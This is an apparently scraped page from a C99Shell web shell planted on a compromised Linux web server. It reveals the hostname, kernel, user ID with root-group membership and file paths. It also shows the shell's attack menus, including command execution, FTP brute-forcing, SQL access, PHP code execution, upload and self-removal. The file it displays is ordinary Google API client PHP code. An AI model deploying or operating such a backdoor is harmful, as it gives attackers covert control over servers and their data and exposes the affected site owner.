!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/google/apiclient-services/src/SA360/   drwxr-xr-x
Free 28.56 GB of 117.98 GB (24.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GoogleAdsSearchads360V0ResourcesAsset.php (6.3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

namespace Google\Service\SA360;

class 
GoogleAdsSearchads360V0ResourcesAsset extends \Google\Collection
{
  protected 
$collection_key 'finalUrls';
  protected 
$callAssetType GoogleAdsSearchads360V0CommonUnifiedCallAsset::class;
  protected 
$callAssetDataType '';
  protected 
$calloutAssetType GoogleAdsSearchads360V0CommonUnifiedCalloutAsset::class;
  protected 
$calloutAssetDataType '';
  
/**
   * @var string
   */
  
public $creationTime;
  
/**
   * @var string
   */
  
public $engineStatus;
  
/**
   * @var string[]
   */
  
public $finalUrls;
  
/**
   * @var string
   */
  
public $id;
  
/**
   * @var string
   */
  
public $lastModifiedTime;
  protected 
$locationAssetType GoogleAdsSearchads360V0CommonUnifiedLocationAsset::class;
  protected 
$locationAssetDataType '';
  protected 
$mobileAppAssetType GoogleAdsSearchads360V0CommonMobileAppAsset::class;
  protected 
$mobileAppAssetDataType '';
  protected 
$pageFeedAssetType GoogleAdsSearchads360V0CommonUnifiedPageFeedAsset::class;
  protected 
$pageFeedAssetDataType '';
  
/**
   * @var string
   */
  
public $resourceName;
  protected 
$sitelinkAssetType GoogleAdsSearchads360V0CommonUnifiedSitelinkAsset::class;
  protected 
$sitelinkAssetDataType '';
  
/**
   * @var string
   */
  
public $status;
  
/**
   * @var string
   */
  
public $trackingUrlTemplate;
  
/**
   * @var string
   */
  
public $type;

  
/**
   * @param GoogleAdsSearchads360V0CommonUnifiedCallAsset
   */
  
public function setCallAsset(GoogleAdsSearchads360V0CommonUnifiedCallAsset $callAsset)
  {
    
$this->callAsset $callAsset;
  }
  
/**
   * @return GoogleAdsSearchads360V0CommonUnifiedCallAsset
   */
  
public function getCallAsset()
  {
    return 
$this->callAsset;
  }
  
/**
   * @param GoogleAdsSearchads360V0CommonUnifiedCalloutAsset
   */
  
public function setCalloutAsset(GoogleAdsSearchads360V0CommonUnifiedCalloutAsset $calloutAsset)
  {
    
$this->calloutAsset $calloutAsset;
  }
  
/**
   * @return GoogleAdsSearchads360V0CommonUnifiedCalloutAsset
   */
  
public function getCalloutAsset()
  {
    return 
$this->calloutAsset;
  }
  
/**
   * @param string
   */
  
public function setCreationTime($creationTime)
  {
    
$this->creationTime $creationTime;
  }
  
/**
   * @return string
   */
  
public function getCreationTime()
  {
    return 
$this->creationTime;
  }
  
/**
   * @param string
   */
  
public function setEngineStatus($engineStatus)
  {
    
$this->engineStatus $engineStatus;
  }
  
/**
   * @return string
   */
  
public function getEngineStatus()
  {
    return 
$this->engineStatus;
  }
  
/**
   * @param string[]
   */
  
public function setFinalUrls($finalUrls)
  {
    
$this->finalUrls $finalUrls;
  }
  
/**
   * @return string[]
   */
  
public function getFinalUrls()
  {
    return 
$this->finalUrls;
  }
  
/**
   * @param string
   */
  
public function setId($id)
  {
    
$this->id $id;
  }
  
/**
   * @return string
   */
  
public function getId()
  {
    return 
$this->id;
  }
  
/**
   * @param string
   */
  
public function setLastModifiedTime($lastModifiedTime)
  {
    
$this->lastModifiedTime $lastModifiedTime;
  }
  
/**
   * @return string
   */
  
public function getLastModifiedTime()
  {
    return 
$this->lastModifiedTime;
  }
  
/**
   * @param GoogleAdsSearchads360V0CommonUnifiedLocationAsset
   */
  
public function setLocationAsset(GoogleAdsSearchads360V0CommonUnifiedLocationAsset $locationAsset)
  {
    
$this->locationAsset $locationAsset;
  }
  
/**
   * @return GoogleAdsSearchads360V0CommonUnifiedLocationAsset
   */
  
public function getLocationAsset()
  {
    return 
$this->locationAsset;
  }
  
/**
   * @param GoogleAdsSearchads360V0CommonMobileAppAsset
   */
  
public function setMobileAppAsset(GoogleAdsSearchads360V0CommonMobileAppAsset $mobileAppAsset)
  {
    
$this->mobileAppAsset $mobileAppAsset;
  }
  
/**
   * @return GoogleAdsSearchads360V0CommonMobileAppAsset
   */
  
public function getMobileAppAsset()
  {
    return 
$this->mobileAppAsset;
  }
  
/**
   * @param GoogleAdsSearchads360V0CommonUnifiedPageFeedAsset
   */
  
public function setPageFeedAsset(GoogleAdsSearchads360V0CommonUnifiedPageFeedAsset $pageFeedAsset)
  {
    
$this->pageFeedAsset $pageFeedAsset;
  }
  
/**
   * @return GoogleAdsSearchads360V0CommonUnifiedPageFeedAsset
   */
  
public function getPageFeedAsset()
  {
    return 
$this->pageFeedAsset;
  }
  
/**
   * @param string
   */
  
public function setResourceName($resourceName)
  {
    
$this->resourceName $resourceName;
  }
  
/**
   * @return string
   */
  
public function getResourceName()
  {
    return 
$this->resourceName;
  }
  
/**
   * @param GoogleAdsSearchads360V0CommonUnifiedSitelinkAsset
   */
  
public function setSitelinkAsset(GoogleAdsSearchads360V0CommonUnifiedSitelinkAsset $sitelinkAsset)
  {
    
$this->sitelinkAsset $sitelinkAsset;
  }
  
/**
   * @return GoogleAdsSearchads360V0CommonUnifiedSitelinkAsset
   */
  
public function getSitelinkAsset()
  {
    return 
$this->sitelinkAsset;
  }
  
/**
   * @param string
   */
  
public function setStatus($status)
  {
    
$this->status $status;
  }
  
/**
   * @return string
   */
  
public function getStatus()
  {
    return 
$this->status;
  }
  
/**
   * @param string
   */
  
public function setTrackingUrlTemplate($trackingUrlTemplate)
  {
    
$this->trackingUrlTemplate $trackingUrlTemplate;
  }
  
/**
   * @return string
   */
  
public function getTrackingUrlTemplate()
  {
    return 
$this->trackingUrlTemplate;
  }
  
/**
   * @param string
   */
  
public function setType($type)
  {
    
$this->type $type;
  }
  
/**
   * @return string
   */
  
public function getType()
  {
    return 
$this->type;
  }
}

// Adding a class alias for backwards compatibility with the previous class name.
class_alias(GoogleAdsSearchads360V0ResourcesAsset::class, 'Google_Service_SA360_GoogleAdsSearchads360V0ResourcesAsset');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--